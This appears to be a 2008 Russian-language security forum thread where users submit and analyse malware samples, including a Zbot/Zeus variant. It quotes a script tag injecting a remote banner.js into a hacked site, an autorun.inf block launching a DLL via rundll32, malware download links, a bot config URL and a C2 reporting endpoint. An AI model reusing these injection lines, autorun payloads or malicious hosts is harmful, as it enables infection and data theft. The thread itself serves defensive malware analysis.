В этом топике происходит исследование малвари: вирусни, троянов, как их вычистить и тд.

| Сообщение посчитали полезным:

Пыталось стартовать, якобы скринсейвер от фишки.нет извлекал


3b2d_04.03.2008_CRACKLAB.rU.tgz - h1.exe

| Сообщение посчитали полезным:

Klever
На фишка частенько гавно впаривают! Либо сами админы либо им пох на то что они крутят на своем сайте. Бабла заплатят они и вставят хз какой ифрейм.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

[HEX] пишет:
Либо сами админы либо им пох на то что они крутят на своем сайте.

Не-а, урл то был другой, но оформление страничи - под фишки. Раскидывают в аську.

| Сообщение посчитали полезным:

так к пе-ид прилеплена гадость какая-то, у меня под виртуалкой на новый код не передавалось управление, так что хз что там именно)

-----
[nice coder and reverser]

| Сообщение посчитали полезным:

Мой сайт попал под трояна.. Вроде как.. К страничкам добавляется:

<script language="javascript" src="http://mainhome.2288.org/banner.js"></script>
Можно ли глянуть - сей скрипт (_http://mainhome.2288.org/banner.js) живой?

-----
программистом не рождаются - им умирают

| Сообщение посчитали полезным:

Gambit
http://exelab.ru/f/action=vthread&forum=6&topic=11393

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

А вот еще один наивный чукотский юноша

149e_06.03.2008_CRACKLAB.rU.tgz - helo.htm

-----
программистом не рождаются - им умирают

| Сообщение посчитали полезным:

Здравствуйте. Поймал бяку, регается на запуск сюда:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelay Load
как InprocServer32. Подгружается Explorer`ом, перехватывает подключение сьёмных устройств, пишет на них 3 файла - desktop.dll (себя же), autorun.inf (для запуска под Rundll32) и thumbs.dd (хз чё). При открытие диска срабатывает функция из длл InstallM и троянчик размножается.
Сам троян собирает что-то в temp, потом копирует в C:\WINDOWS\system32\mswmpdat.tlb. Логер кароче, но так и не понял за чем охотится. В стрингах есть такое livenews.ath.cx/update ./images/ index_16.jpg но что-то без ответа. Также похоже, что какая та часть текста зашифрована, потому что ключи регистров в дизасме странные. Вот такая Java Virtual Mashine




d8f1_06.03.2008_CRACKLAB.rU.tgz - mstmdm.dll

| Сообщение посчитали полезным:

Yuge
Там строчки тупо поксорины на 0x55

Вот несколько строк поксореных еще разок на 0x55
GetPerAdapterInfo

GetAdaptersInfo

[autorun]
open=
shell\open=Explore
shell\open\Command=rundll32.exe .\desktop.dll,InstallM
shell\open\Default=1

Software\Microsoft\Windows\CurrentVersion\StrtdCfg

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Вот еще:
---------------------------------------------------------------------- ----------------------
Bы выйгpaли npиз, noлyчeниe здecь - www.kirunastyrkelyft.se/index2.html
---------------------------------------------------------------------- ----------------------

-----
программистом не рождаются - им умирают

| Сообщение посчитали полезным:

там простой редирект стоит

-----
[nice coder and reverser]

| Сообщение посчитали полезным:

фига се! А такой домен (.se) стоит 1700 рэ в год

хотя.. видимо, хозяева "Вип-Порно" могут себе это позволить..

-----
программистом не рождаются - им умирают

| Сообщение посчитали полезным:

Размещал тему в разделе "Программирование", но ее закрыли. Модератор предложил разместить инфомацию тут:
"Многие знают о таком файловом обменнике letitbit.net. Так вот, при скачивании с него файлов требуется установить программу bitaccelerator, причем троянскую программу-рекламу. Читал тут (Слух: Ad-Ware подменяет выдачу "Яндекса") http://roem.ru/2008/02/03/addednews5231 , что программа заменяет поисковые запросы с яндекса, и вместо нужной страницы пользователь попадает на страницу рекламодателя. Таким образом владельцы Летитбита имеют неплохие бабки. У меня одно время стояла эта прога, но когда узнал, что это вирус, удалил ее. Хотелось бы знать, что на самом деле делает программка и какие данные отсылает её владельцу. (Кто хочет скачать bitaccelerator (еще раз предупреждаю - это троянская программа-реклама), могут воспользваться, например, этой ссылкой http://letitbit.net/download/555c16307371/Fantom.rar.html ). Заранее спасибо."

| Сообщение посчитали полезным:

nitsikПоствил себе на другой тестовый комп,при поиске на яндексе действительно подменяет страницу,3 ссылка не соответствует запросу и написано все время про порно =)
Для скачки с летбита использую Portable bitaccelerator он вроде никуда ничего не прописывает,или просто скрипт из аттача Letitbit URL converter.hta
Берите,кому надо

d5a9_10.03.2008_CRACKLAB.rU.tgz - Letitbit URL converter.hta

-----
M&#225 enginn renna undan &#254v&#237 sem honum er skapa&#240

| Сообщение посчитали полезным:

Насчет вирусов - подхватил заразу (через иё) короче глупая шутка сама только меняет параметры безопастности виндовз. луизия - обозвал ее Dr Web. исправил все кроме одного пропал пункт создать и не могу создать папки. кто знает как вернуть это на место (вирус уже удален). Памагите пажайлуста.

-----
Md5 fcbb6c9c9a5029b24d70f2d67c7cca74

| Сообщение посчитали полезным:

Stack
www.hijackthis.de/en
или
www.z-oleg.com/secur/avz/download.php

помоему помагают востановить состояние в нормальный вид.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

-----
Md5 fcbb6c9c9a5029b24d70f2d67c7cca74

| Сообщение посчитали полезным:

87.118.110.78/prx2.exe
отправляет методом GET данные вот этому скрипту: 87.118.110.78/prxget.php?serv=

Переменные, передаваемые в запросе: "&cnt=", "&socks=", "&https="


Похоже на спам бота... Ну или что то связанное с прокси... ВМ варе слитала

-----
-=истина где-то рядом=-

| Сообщение посчитали полезным:

KingSise
На ихнем сайте тажа ботва юзается что и тут обсуждали http://www.exelab.ru/f/action=vthread&forum=6&topic=11393

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

свежачёк:
гавнапенч, каспер палит а нод молчит
пасс 1
убейте его хост)

3814_17.03.2008_CRACKLAB.rU.tgz - TheBestFebruary.rar

-----
AutoIt

| Сообщение посчитали полезным:

это у нас хекц мастер убивать говнопинчевые хосты...

-----
iNTERNATiONAL CoDE CReW

| Сообщение посчитали полезным:

странно то, что на анубисе он себя не проявляет (analysis.seclab.tuwien.ac.at), типа детектит его и молчком себя ведёт?

-----
AutoIt

| Сообщение посчитали полезным:

OLEGator
Анубис помоему никогда пинчи не палил
Пользуйтесь другими аналогичными сервисами или пользуйтесь VM.

hxxp://barlineups.com/moneris/examples/gif/top.gif

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

from http://exelab.ru/f/action=vthread&forum=6&topic=11393

http://rapidshare.com/files/101290991/file.7z (40кб)
пасс: pass


Появился файл C:\WINDOWS\system32\ntos.exe и в реестре чувствую что-то лишнее

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\ntos. exe,"

На вирустотале всего 6 антивирусов палят.
http://www.virustotal.com/ru/analisis/85eff4a88cd0f1bdb5bd995c04bc57dd

| Сообщение посчитали полезным:

4t эх все изощреннее и изошронее становиться эта гадость.


вроде у тебя ента : ru.wikipedia.org/wiki/Вредоносная_программа

-----
Md5 fcbb6c9c9a5029b24d70f2d67c7cca74

| Сообщение посчитали полезным:

троян zeus с паблика у него)

-----
Shalom ebanats!

| Сообщение посчитали полезным:

> rapidshare.com/files/101290991/file.7z (40кб)

Перевыложите на ифолдер или иной любой, плз.

| Сообщение посчитали полезным:

RUNaum
hexcsl.com/upload/stats/863

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

4t
Бот из семейства Zbot

Создает файлы:
1 %System%\ntos.exe 304,128 bytes 0xEEB73DBB15FC71EB139D0CFAB57E763B
2 %System%\wsnpoem\audio.dll 101 bytes 0x159474CEBABCF84B5E10578183CE529E
3 %System%\wsnpoem\video.dll 0 bytes 0xD41D8CD98F00B204E9800998ECF8427E

Внедряется в памяти с ледующие процессы:
services.exe %System%\services.exe 4,096 bytes
lsass.exe %System%\lsass.exe 4,096 bytes
svchost.exe %System%\svchost.exe 4,096 bytes
svchost.exe %System%\svchost.exe 4,096 bytes
svchost.exe %System%\svchost.exe 4,096 bytes
svchost.exe %System%\svchost.exe 4,096 bytes
svchost.exe %System%\svchost.exe 4,096 bytes
alg.exe %System%\alg.exe 4,096 bytes

Создает:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network]
UID = "%ComputerName%_0001C7DF"

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explore r]
{F710FA10-2031-3106-8872-93A2B5C5C620} = F7 09 F2 0D
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
userinit = "%System%\ntos.exe"

Модифицирует:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
Userinit = "%System%\userinit.exe,%System%\ntos.exe,"

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explore r\Shell Folders]
Cookies = "%System%\config\systemprofile\Cookies"
Cache = "%System%\config\systemprofile\Local Settings\Temporary Internet Files"
History = "%System%\config\systemprofile\Local Settings\History"

И то и другое для автозапуска.

От сюда тянет конфигурацию бота hxxp://www.amfitos.com/classes/cfg/cfg.bin

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

У него сейчас какая-то новая разновидность, раньше эти файлы были видны, а теперь он скорее всего хучит FindFileNext и убирает себя из списка. Приходится лечить или с загрузочной компашки, или по сети с другого компа. [HEX], а ты не смотрел, что он вообще делает?

| Сообщение посчитали полезным: